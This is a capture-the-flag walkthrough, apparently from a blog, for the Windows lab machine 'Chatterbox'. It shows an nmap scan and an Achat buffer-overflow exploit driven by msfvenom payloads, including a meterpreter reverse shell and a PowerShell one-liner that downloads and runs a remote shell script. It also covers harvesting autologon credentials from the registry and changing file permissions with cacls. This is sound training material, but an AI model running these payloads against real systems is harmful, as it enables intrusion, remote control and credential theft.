Today, we’re going to solve another CTF machine “Chatterbox“. It is now retired box and can be accessible to VIP member.

Specifications

• Target OS: Windows
• Services: 9255, 9256
• IP Address: 10.10.10.74
• Difficulty: Medium

Contents

• Getting user
• Getting root

Enumeration

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v 10.10.10.74

Enumerating Port 9255

Nmap reveals there’s Achat service running on http protocol.

We got nothing here let’s move ahead.

Enumerating Port 9256

We know there’s an achat application installed. To find the version of it we can do banner grabbing but in this case it didn’t worked.

Let’s searchsploit achat

Exploit: Achat 0.150 beta7 – Remote Buffer Overflow

searchsploit -m exploits/windows/remote/36025.py

Let’s edit our exploit.

Exploitation

Exploit: https://www.exploit-db.com/exploits/36025

Method #1

Let’s create our payload first and insert into exploit.

msfvenom — platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x
88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\
xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1
\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We executed our exploit and starting listening our reverse shell.

Reverse shell was consistently being closed so we migrated upon executing.

set AutoRunScript post/windows/manage/migrate

System Information

Method #2

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:8000/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

However, metasploit shell is much convenient.

User flag can be found here C:\Users\Alfred\Desktop\user.txt

Privilege Escalation

Let’s start by doing basic priv esc enumeration.

By running through some basic priv esc enumeration and running powerup.ps1 script we got credentials in the registry for autologon.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

DefaultUserName: Alfred
DefaultPassword: Welcome1!

There’s a possibility that the password can be reuse for administrator. But since we already have read access into administrator directory as user alfred, we see in below screenshot.

We can change permissions on root.txt using icacls.

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop 
cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F 
                               CHATTERBOX\Administrator:(OI)(CI)(ID)F 
                               BUILTIN\Administrators:(OI)(CI)(ID)F 
                               CHATTERBOX\Alfred:(OI)(CI)(ID)F 


C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y
Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt
cacls C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R